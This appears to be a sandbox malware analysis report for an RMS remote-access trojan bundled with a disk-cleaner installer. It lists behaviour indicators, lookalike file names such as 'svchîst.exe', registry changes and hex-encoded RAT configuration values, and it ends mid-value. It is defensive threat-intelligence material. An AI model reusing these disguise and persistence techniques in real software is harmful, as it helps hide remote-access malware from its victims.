Malware Analysis Report

2024-11-15 08:39

Sample ID 220417-hw3gysabam
Target 63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443
SHA256 63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443
Tags
rms discovery evasion rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443

Threat Level: Known bad

The file 63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443 was found to be: Known bad.

Malicious Activity Summary

rms discovery evasion rat spyware stealer trojan

RMS

Drops file in Drivers directory

Modifies Windows Firewall

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Checks for any installed AV software in registry

Checks installed software on the system

Enumerates connected drives

Drops file in System32 directory

Drops file in Program Files directory

Enumerates physical storage devices

Runs ping.exe

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Views/modifies file attributes

Modifies registry class

Modifies Internet Explorer settings

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-04-17 07:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-04-17 07:06

Reported

2022-04-17 07:08

Platform

win7-20220414-en

Max time kernel

148s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe"

Signatures

RMS

trojan rat rms

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\ssleay32.dll C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\libeay32.dll C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\attrib.exe N/A

Modifies Windows Firewall

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
N/A N/A C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks for any installed AV software in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\software\Wow6432Node\avast software\avast C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\software\avast software\avast C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Key opened \REGISTRY\MACHINE\software\avira\antivir desktop C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Key opened \REGISTRY\MACHINE\software\Wow6432Node\avira\antivir desktop C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\software\avira\antivirus C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Key opened \REGISTRY\MACHINE\software\avast software\avast C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\I: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\L: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\N: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\Q: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\S: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\U: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\X: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\P: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\W: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\Y: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\V: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\E: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\F: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\G: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\H: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\J: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\M: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\R: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\K: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\O: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
File opened (read-only) \??\T: C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\attrib.exe N/A
File created C:\Windows\SysWOW64\idfgvgjnghcdfb.reg C:\Windows\SysWOW64\cmd.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-5C1N5.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-OPTGD.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GAOA0.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-G72EI.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-F6O34.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-32O7J.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BG8EL.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-6PI5S.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-75449.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-KFGUG.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-58M2H.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-V319U.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-VQBJ1.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-0O9PS.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-KRLI7.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-PG44I.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-M18G2.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-1HUTB.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-SQ5H1.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-LMQEF.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-U4MAS.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDefrag.dll C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-D451B.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-5UE2M.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2H65H.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\LiveUpdate.exe C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-DR5QR.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-UADDU.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-U916K.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2GBAA.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-AUIT8.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-CNFVQ.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-6VCB3.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-GNDOM.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-7JUR2.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-9EEKT.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2DRG1.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.msg C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-G2VSA.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-K876C.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-DVIBG.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-73D7Q.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-87CMC.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-0QECA.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-Q04IE.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File opened for modification C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-LM4UH.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-8J92D.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-POD21.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-86RQ9.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-8PIBV.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BFDUC.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A
File created C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-J1CUS.tmp C:\Users\Admin\AppData\Local\Temp\is-I2F6H.tmp\setup.tmp N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\WiseDiskCleaner.exe = "11000" C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\install.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\FUSClientPath = "C:\\Windows\\SysWOW64\\drivers\\maskhostex.exe" C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.gz\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223639313130223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c46574570794f456c45515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c4a484f58525a563278315355633161474a585657646a4d3278365a45645764456c49546d786a626c70775933704661553144515564424d5656465158643357677053527a6c305756647364556c484e5768695631566e597a4e73656d5248566e524a534535735932356163474e3651575647647a4235545770424d4531555933645056454579546b524f59555a334d48704e616b4577436b31555558645056454579546b524f5955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73525749794d576868567a526e596d314764467054516e6f4b5a56684f4d4670584d47646a4d6c5a355a473173656b31545358644a51566c45566c465252455243624556694d6a466f595663305a324a74526e526155304a365a56684f4d4670584d47646a4d6c5a355a4731736567704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651586c574e545a4d4d564e475a46526e51307777566c524352585659436e526b4d57684d6547564352557047536c5252536b4e36566c6b785a553958597a466f53564672524646304e5339775a3168346155526e62465a51566b5a4e4e306450516e524c574663775a336c3154303432526b304b4e47744b63584a4b5a6b4a4b6455356d637a4a474d7a5648596b6730554656615a6d5a3561336c6a536d31484e6b785a6357356a626d7075547a5a4c63475679634852745247467359575a77534539356445395352676f7a4c325177656e4532575868715255526f566c5652626d5a476355564554474e3555545a3561574e61527a6858614573774e48466e526b4e3353444245533164555a6e5678